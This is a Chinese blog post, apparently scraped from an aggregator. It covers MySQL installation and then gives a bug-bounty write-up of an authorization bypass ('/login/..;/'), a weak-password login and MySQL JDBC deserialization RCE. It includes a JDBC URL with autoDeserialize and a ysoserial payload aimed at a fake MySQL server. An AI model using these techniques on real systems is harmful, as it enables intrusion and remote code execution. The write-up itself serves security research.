当前位置: 首页 > news >正文

运维知识点-MySQL从小白到入土

在这里插入图片描述

MySQL从小白到入土

  • mysql 服务器安装
  • windows mysql 服务
  • 漏洞复现-mysql jdbc反序列化-权限绕过

mysql 服务器安装

 https://dev.mysql.com/downloads/mysql/

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

https://www.cnblogs.com/xiaostudy/p/12262804.html

点餐小程序腾讯云服务器安装mysql8
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

windows mysql 服务

net start mysql

漏洞复现-mysql jdbc反序列化-权限绕过

乌云 通用系统的洞
fofa 查

在这里插入图片描述

但是这个系统被他魔改过加了验证码,前端也加密了,老洞肯定没有。

在这里插入图片描述
登录框大概长这样,
看了一下有shiro但是打不了。

在这里插入图片描述

权限绕过发现/login/…;/ 能直接进去

在这里插入图片描述
看不到任何数据,点系统参数配置这个功能发现404

在这里插入图片描述
去看了下同cms的站,
发现直接访问index.jsp,
也可以进去(但是src那个站进不去不知道被咋改过)
发现这个功能跳到/adminLogin.jsp 然后弱口令admin123进去了

在这里插入图片描述
当时直接把这个登录的包拿到src的那个站去试了一下

发现他只是把jsp删了实际上功能还在
然后就直接进到了系统参数配置这里

在这里插入图片描述
大概长这样,有一个测试连接的功能,点了一下抓包,包结构如下
在这里插入图片描述
可以控制mysql连接地址,于是想到mysql服务端读客户端文件。
将mysql连接地址改为恶意mysql服务端地址发包,好像不行
在这里插入图片描述
然后又想到mysql jdbc反序列化,以前没搞过,在github找到一个项目。

 https://github.com/fnmsd/MySQL_Fake_Server

需要一个ysoserial.jar我这边使用的

  https://github.com/zema1/ysoserial

可以直接打回显,看了下上面那个项目的README感觉有点麻烦,于是直接把
在这里插入图片描述

 url=jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true
&useUnicode=true
&characterEncoding=utf-8
&username=yso_urldns_http//www.baidu.com/
&password=123456	 

服务器这边开启恶意mysql服务端,发包。
在这里插入图片描述
在这里插入图片描述
成功RCE

http://www.lryc.cn/news/217823.html

相关文章:

  • 【蓝桥杯基础题】门牌制作
  • MyBatis底层原理(小白版本)
  • 水经微图Web版从入门到精通
  • IntelliJ IDEA 2023 最新版如何试用?IntelliJ IDEA 2023最新版试用方法及验证ja-netfilter配置成功提示
  • LeetCode541. Reverse String II
  • ios原生分享
  • 【Ubuntu】安装chrome之后无法启动
  • 顺序栈练习
  • 安全与HTTP协议:为何明文传输数据成为争议焦点?
  • 【笔记】excel怎么把汉字转换成拼音
  • opencv官网文档学习
  • Android性能优化--Perfetto用SQL性能分析
  • NLP之Bert实现文本分类
  • Pytorch从零开始实战08
  • docker部署Jenkins(Jenkins+Gitlab+Maven实现CI/CD)
  • mapbox使用marker创建html点位信息
  • 项目构建工具maven的基本配置
  • 超详细docker学习笔记
  • Adobe acrobat 11.0版本 pdf阅读器修改背景颜色方法
  • HCIA数据通信——路由协议
  • 十种常见典型算法
  • python-列表推导式、生成器表达式
  • NLP 模型中的偏差和公平性检测
  • YUV图像格式详解
  • 软考高项-质量管理措施
  • Redis那些事儿(一)
  • 【多媒体文件格式】M3U8
  • linux中xargs的实用技巧
  • 【Jmeter】生成html格式接口自动化测试报告
  • 如何将极狐GitLab 漏洞报告导出为 HTML 或 PDF 格式或导出到 Jira